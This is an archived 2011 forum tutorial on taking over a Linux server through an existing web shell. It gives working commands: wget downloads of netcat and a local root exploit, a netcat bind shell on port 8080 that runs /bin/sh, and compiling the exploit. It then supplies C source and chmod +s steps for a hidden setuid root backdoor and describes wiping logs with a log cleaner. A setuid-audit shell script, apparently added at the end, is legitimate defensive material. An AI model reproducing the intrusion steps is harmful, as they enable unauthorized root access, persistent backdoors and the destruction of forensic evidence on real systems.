
 **TuT** Server Rooting!!

Administrator
ADMIN
PostSubject: **TuT** Server Rooting!!   Sat Nov 19, 2011 3:53 am

**Please note: you must have access to a Linux box prior to using this tutorial (this is rooting ONLY).**

First: Download / Obtain Access to the Following:

Required for this Tutorial:

Shell Access - To a Linux Box
Local Root Exploit - Depending on Linux OS and Kernel Version of Box
mig-log cleaner - [You must be registered and logged in to see this link.] and learn how to compile it
Netcat - [You must be registered and logged in to see this link.]
Netcat(unix) - [You must be registered and logged in to see this link.] and learn how to compile it
Patience - Work at it until you get the job done.


Now that you have all that in order, let's begin.

Step 1: Reconnaissance

Login to Shell -> Find Out Linux OS and Kernel Versions of Box (ie: Linux 2.6.8) -> Locate a "Local Root Exploit" for Linux Version (can be found using Google/security vulnerability websites) -> Go into a Writable Folder in the Shell


Step 2: Netcat

Find the "Command Execution" area in the Shell -> Enter the following: wget [You must be registered and logged in to see this link.] (unshortened) -> Type chmod +x nc -> Find the "Command Execution" area in the Shell -> Enter the following: ./nc -l -p 8080 -e /bin/sh (example: shell can be /bin/sh or cmd.exe) -> Install Netcat on your PC -> Enter the following: nc VictimIP Port *in our case 8080* -> Then enter: eg 123.123.123.123 8080

This should make an interactive shell, if it didn't, verify whether or not port 8080 was open. However, if you DO have an interactive shell.. this box is ready for rooting. Type the following: nc victimip port


Step 3: Exploiting

Find the Local Root Exploit for this Box -> In the newly spawned shell, type wget [You must be registered and logged in to see this link.] -> If the exploit is not compiled, compile it by typing the following: gcc xpl.c -o xpl;chmod +x xpl -> Now, chmod xpl ->

**Note: The exploit will vary on their usage so make sure you have an understanding of the root exploit you are using.**

You can run your xpl file by entering in: ./xpl

Wait until your exploit has finished running. Once it is done, enter:

whoami

The whoami command tells you who you are. If it tells you root, then your xpl has done
its job and you now have root privileges on the box. Or you can type:

id

which will give you something like:

uid=0(root) gid=0(root) groups=500(apache) or something similar

And now you can do your happy dance.

Now that we have rooted the box and finished humiliating ourselves by dancing around, we want to make
sure that we can come and go as we please without all the hassle of rooting the box over and over. So
we will want to create some kind of backdoor.
We can make this happen with a few lines of code:

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

int main( void )
{
setuid( 0 );
system( "/bin/bash" );

return 0;
}

Compile it and change permissions:

root@foobar /root# gcc -o .bkdr main.c
root@foobar /root# chown root:root .bkdr
root@foobar /root# chmod +s .bkdr

Now, all you have to do is put .bkdr somewhere on the system where you can execute it (preferably
in the $PATH) and if you execute it as another user:

raif@foobar /home/raif$ /usr/local/bin/.bkdr
root@foobar /home/raif# whoami
root

Now you have your access back.

Alright, we have almost completed our mission: we have successfully rooted our victim's box and created our backdoor. Now all we need to do is wipe the tracks that we left in the logs and be on our way. This can be done by using a log cleaner of some kind. For this tutorial we used mig-log cleaner, which you
can get here:
[You must be registered and logged in to see this link.]

Once again we can use our wget command to upload our logcleaner to the rooted box.
[You must be registered and logged in to see this link.]

Now just run the logcleaner:

./miglc

The mig-log Cleaner has a wide variety of functions which are displayed when you run the log cleaner
so you may choose how exactly you want to clean the logs with the commands given to you. I hope you
enjoyed my tutorial and learned something from it as well. Good luck to you all.
http://www.okaracantt.com
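
From the defender's side, the helper described in this post (a root-owned binary with the setuid bit set via `chmod +s`, given a dot-prefixed name and placed in a `$PATH` directory) is what a periodic setuid audit catches. The following is an added example, not part of the original post: a POSIX shell function that lists setuid/setgid files under a directory and reports those with a hidden name or missing from a baseline list. The function name `audit_suid`, the baseline file format (one absolute path per line) and the reason labels are assumptions of this example.

```shell
#!/bin/sh
# Added example (not from the original post): audit setuid/setgid files.
# Usage: audit_suid DIR BASELINE [OWNER_UID]
#   DIR        tree to scan (stays on one filesystem)
#   BASELINE   known-good setuid/setgid paths, one absolute path per line
#              (hypothetical format chosen for this example)
#   OWNER_UID  numeric owner to match; defaults to 0 (root)
# Prints "REASONS<TAB>PATH" for every file that needs review.
audit_suid() {
    as_dir=$1
    as_baseline=$2
    as_uid=${3:-0}
    # -perm -4000 is the setuid bit, -perm -2000 the setgid bit; "chmod +s"
    # as used on the page sets both.
    find "$as_dir" -xdev -type f -user "$as_uid" \
        \( -perm -4000 -o -perm -2000 \) -print 2>/dev/null | sort |
    while IFS= read -r as_path; do
        as_reasons=""
        # A dot-prefixed name hides the file from a plain "ls".
        case ${as_path##*/} in
            .*) as_reasons="hidden-name" ;;
        esac
        # Anything absent from the baseline appeared after it was taken.
        if ! grep -Fxq -- "$as_path" "$as_baseline" 2>/dev/null; then
            as_reasons="${as_reasons:+$as_reasons,}not-in-baseline"
        fi
        if [ -n "$as_reasons" ]; then
            printf '%s\t%s\n' "$as_reasons" "$as_path"
        fi
    done
    return 0
}

# Stand-alone use: sh audit_suid.sh /usr /var/lib/suid-baseline.txt
if [ "$#" -ge 2 ]; then
    audit_suid "$@"
fi
```

Take the baseline on a known-good install and keep it off the host, since anyone who already has root can edit a local copy.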
 